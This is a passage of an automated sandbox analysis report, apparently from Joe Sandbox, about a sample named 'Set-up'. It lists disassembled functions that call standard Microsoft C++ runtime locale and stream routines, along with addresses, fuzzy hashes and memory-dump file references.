                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_Vlocale@2@W@std@@@std@@std::locale::facet::_$?pubimbue@?$basic_streambuf@_H_prolog3IncrefV32@@$?getloc@?$basic_streambuf@_Decref
                                                                                              • String ID:
                                                                                              • API String ID: 2308012705-0
                                                                                              • Opcode ID: c1ee09297c53788356e41cd59de49c6c4056345add846550a4cccf90095fda0c
                                                                                              • Instruction ID: 7bc4b91e20b94676c70157a5f7e8bb68aa916be76d1ae1c9e0064e195d4a1a26
                                                                                              • Opcode Fuzzy Hash: c1ee09297c53788356e41cd59de49c6c4056345add846550a4cccf90095fda0c
                                                                                              • Instruction Fuzzy Hash: C241C3B8A10A05DFCB19CF68C5D09AAB7F1BF8D300B50415DDA469BB64DB34BA11CFA0
                                                                                              Function 6BC23BAA Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC23BB1
                                                                                              • ?getloc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000014), ref: 6BC23C7B
                                                                                                • Part of subcall function 6BC22533: std::locale::facet::_Incref.LIBCPMT ref: 6BC22548
                                                                                              • ?pubimbue@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAE?AVlocale@2@ABV32@@Z.MSVCP100(?,00000000,00000014), ref: 6BC23C8B
                                                                                                • Part of subcall function 6BC22591: __EH_prolog3.LIBCMT ref: 6BC22598
                                                                                                • Part of subcall function 6BC22591: std::locale::facet::_Incref.LIBCPMT(?,?,?,?,00000004), ref: 6BC225B1
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?pubimbue@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAE?AVlocale@2@ABV32@@Z.MSVCP100(?,?,00000014), ref: 6BC23CA6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_Vlocale@2@W@std@@@std@@std::locale::facet::_$?pubimbue@?$basic_streambuf@_H_prolog3IncrefV32@@$?getloc@?$basic_streambuf@_Decref
                                                                                              • String ID:
                                                                                              • API String ID: 2308012705-0
                                                                                              • Opcode ID: 4283f60eae7fb4e9f25b1c0a50c46a092082302c036f300224ca50232ae6a636
                                                                                              • Instruction ID: 1e41dab3bdcb15dc6f2737d5215d22e7961e0d180ceb56303ba9ae8fb05fa438
                                                                                              • Opcode Fuzzy Hash: 4283f60eae7fb4e9f25b1c0a50c46a092082302c036f300224ca50232ae6a636
                                                                                              • Instruction Fuzzy Hash: 1B41C7B8611A05DFCB18CF68C5909AAB7F2FF8D300B50456CD94A9BB50DB30BA41CF90
                                                                                              Function 6BC1C045 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___mb_cur_max_func.MSVCR100 ref: 6BC1C099
                                                                                              • _Wcrtomb.MSVCP100(?,?,?,?), ref: 6BC1C0BA
                                                                                                • Part of subcall function 6BC3ACBD: ___lc_handle_func.MSVCR100 ref: 6BC3ACCB
                                                                                                • Part of subcall function 6BC3ACBD: ___lc_codepage_func.MSVCR100 ref: 6BC3ACD4
                                                                                              • _Wcrtomb.MSVCP100(?,?,?,?), ref: 6BC1C0E4
                                                                                              • memcpy.MSVCR100(00000000,?,00000000), ref: 6BC1C103
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Wcrtomb$___lc_codepage_func___lc_handle_func___mb_cur_max_funcmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 1260106109-0
                                                                                              • Opcode ID: 79b55fd1265ac4b43e0154efa6888a612ad3620653475ca3cbb7c18b029de3d9
                                                                                              • Instruction ID: 262b4ff969b8de71b6d516a5cfd67d1b0969d4c5715aa40a5003f2b6bf46da9e
                                                                                              • Opcode Fuzzy Hash: 79b55fd1265ac4b43e0154efa6888a612ad3620653475ca3cbb7c18b029de3d9
                                                                                              • Instruction Fuzzy Hash: A031F6B5A5420ADFCB04DFA8C8819AEB7F8FF58315B604469F955E7240E738AA50CB60
                                                                                              Function 6BC2CAD0 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2CAD7
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,0000002C), ref: 6BC2CAF6
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,0000002C), ref: 6BC2CB1B
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26234: __EH_prolog3.LIBCMT ref: 6BC2623B
                                                                                                • Part of subcall function 6BC26234: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC26245
                                                                                                • Part of subcall function 6BC26234: int.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC2625C
                                                                                                • Part of subcall function 6BC26234: std::locale::_Getfacet.LIBCPMT ref: 6BC26265
                                                                                                • Part of subcall function 6BC26234: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC262C5
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,0000002C), ref: 6BC2CBD4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@_LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 565754905-0
                                                                                              • Opcode ID: 004ea28c141477fcfde73173c3dc36e265bd37fe1bab5ecccbee9cc5beb8b840
                                                                                              • Instruction ID: 3d1707ceb82928b5091969a396580090ccdd9ec2b0eb34fc980882b630e1791c
                                                                                              • Opcode Fuzzy Hash: 004ea28c141477fcfde73173c3dc36e265bd37fe1bab5ecccbee9cc5beb8b840
                                                                                              • Instruction Fuzzy Hash: 7C31BC75A15208DFCB04CFE8C984BEEBBB5BF18304F244099E046B7281E7388B44CB60
                                                                                              Function 6BC2CD09 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2CD10
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,0000002C), ref: 6BC2CD2F
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,0000002C), ref: 6BC2CD54
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26234: __EH_prolog3.LIBCMT ref: 6BC2623B
                                                                                                • Part of subcall function 6BC26234: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC26245
                                                                                                • Part of subcall function 6BC26234: int.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC2625C
                                                                                                • Part of subcall function 6BC26234: std::locale::_Getfacet.LIBCPMT ref: 6BC26265
                                                                                                • Part of subcall function 6BC26234: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC262C5
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,0000002C), ref: 6BC2CE09
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@_LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 565754905-0
                                                                                              • Opcode ID: 87d71582e18d8bc20d8952b208a335a96e786fc95fb3d84ea1c6949f0f5c934d
                                                                                              • Instruction ID: 18d6d500ae127c87af06e580a0a54c2332068c4ea77e5c71895feb8c22a142dc
                                                                                              • Opcode Fuzzy Hash: 87d71582e18d8bc20d8952b208a335a96e786fc95fb3d84ea1c6949f0f5c934d
                                                                                              • Instruction Fuzzy Hash: 2B318771A152089FCB04CFE8C990BEEBBB5BF18318F244099E146B7291E7389B05CB61
                                                                                              Function 6BC2E385 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2E38C
                                                                                              • ?_Ipfx@?$basic_istream@GU?$char_traits@G@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,0000002C), ref: 6BC2E3AB
                                                                                                • Part of subcall function 6BC1E00D: __EH_prolog3_catch.LIBCMT ref: 6BC1E014
                                                                                                • Part of subcall function 6BC1E00D: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E037
                                                                                                • Part of subcall function 6BC1E00D: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E05C
                                                                                                • Part of subcall function 6BC1E00D: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E085
                                                                                                • Part of subcall function 6BC1E00D: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1E0AE
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,0000002C), ref: 6BC2E3D0
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC262D7: __EH_prolog3.LIBCMT ref: 6BC262DE
                                                                                                • Part of subcall function 6BC262D7: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262E8
                                                                                                • Part of subcall function 6BC262D7: int.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262FF
                                                                                                • Part of subcall function 6BC262D7: std::locale::_Getfacet.LIBCPMT ref: 6BC26308
                                                                                                • Part of subcall function 6BC262D7: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC26368
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,0000002C), ref: 6BC2E489
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefG@std@@@std@@GetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@U?$char_traits@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 587729422-0
                                                                                              • Opcode ID: 2b616fa570c1fbcb81c4bd7a15d8051318370cbf312870696be5a8c0368dc709
                                                                                              • Instruction ID: 458050e441bb43387c11b2e6dd93dc1c9bd0726896778e5174fe6592f740a330
                                                                                              • Opcode Fuzzy Hash: 2b616fa570c1fbcb81c4bd7a15d8051318370cbf312870696be5a8c0368dc709
                                                                                              • Instruction Fuzzy Hash: 2D318B719252099FCF04CFE8C994AEDBBBABF08304F244059E546B7281E7389B04CB61
                                                                                              Function 6BC2B28C Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2B293
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,0000002C), ref: 6BC2B2B2
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,0000002C), ref: 6BC2B2D7
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26191: __EH_prolog3.LIBCMT ref: 6BC26198
                                                                                                • Part of subcall function 6BC26191: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261A2
                                                                                                • Part of subcall function 6BC26191: int.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261B9
                                                                                                • Part of subcall function 6BC26191: std::locale::_Getfacet.LIBCPMT ref: 6BC261C2
                                                                                                • Part of subcall function 6BC26191: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC26222
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,0000002C), ref: 6BC2B390
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?getloc@ios_base@std@@D@std@@@std@@H_prolog3_catchU?$char_traits@U?$char_traits@_Vlocale@2@W@std@@@std@@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 3082886559-0
                                                                                              • Opcode ID: 1c6905479e5d38b934c210dc331e2dfcee2d727dfb79ae9097d86e2b717db4b0
                                                                                              • Instruction ID: 1236c0b45e7c80e6e60a6e505184b6247115765cc0e83ee36fecf2c96b084d8e
                                                                                              • Opcode Fuzzy Hash: 1c6905479e5d38b934c210dc331e2dfcee2d727dfb79ae9097d86e2b717db4b0
                                                                                              • Instruction Fuzzy Hash: A8318B71A152099FCB04CFA8C990AEDBBB5BF48304F24405DE046B7291EB389B05CB61
                                                                                              Function 6BC2EB08 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2EB0F
                                                                                              • ?_Ipfx@?$basic_istream@GU?$char_traits@G@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2EB2E
                                                                                                • Part of subcall function 6BC1E00D: __EH_prolog3_catch.LIBCMT ref: 6BC1E014
                                                                                                • Part of subcall function 6BC1E00D: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E037
                                                                                                • Part of subcall function 6BC1E00D: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E05C
                                                                                                • Part of subcall function 6BC1E00D: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E085
                                                                                                • Part of subcall function 6BC1E00D: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1E0AE
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2EB4C
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC262D7: __EH_prolog3.LIBCMT ref: 6BC262DE
                                                                                                • Part of subcall function 6BC262D7: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262E8
                                                                                                • Part of subcall function 6BC262D7: int.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262FF
                                                                                                • Part of subcall function 6BC262D7: std::locale::_Getfacet.LIBCPMT ref: 6BC26308
                                                                                                • Part of subcall function 6BC262D7: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC26368
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2EBB0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefG@std@@@std@@GetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@U?$char_traits@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 587729422-0
                                                                                              • Opcode ID: f0b94767b50d3f1a36d121ee8afed4fe09670e7e455b88d733f00b14fcdc6ca0
                                                                                              • Instruction ID: daf57d32d8e8dc5edfa050315de1c40488b4b292018828980413ae7d31449be4
                                                                                              • Opcode Fuzzy Hash: f0b94767b50d3f1a36d121ee8afed4fe09670e7e455b88d733f00b14fcdc6ca0
                                                                                              • Instruction Fuzzy Hash: B921AC71A11108AFCB04CFA8C981EEDBBB9AF18308F244059E142B7381EB399F04DB60
                                                                                              Function 6BC2BB16 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2BB1D
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2BB3C
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2BB5A
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26191: __EH_prolog3.LIBCMT ref: 6BC26198
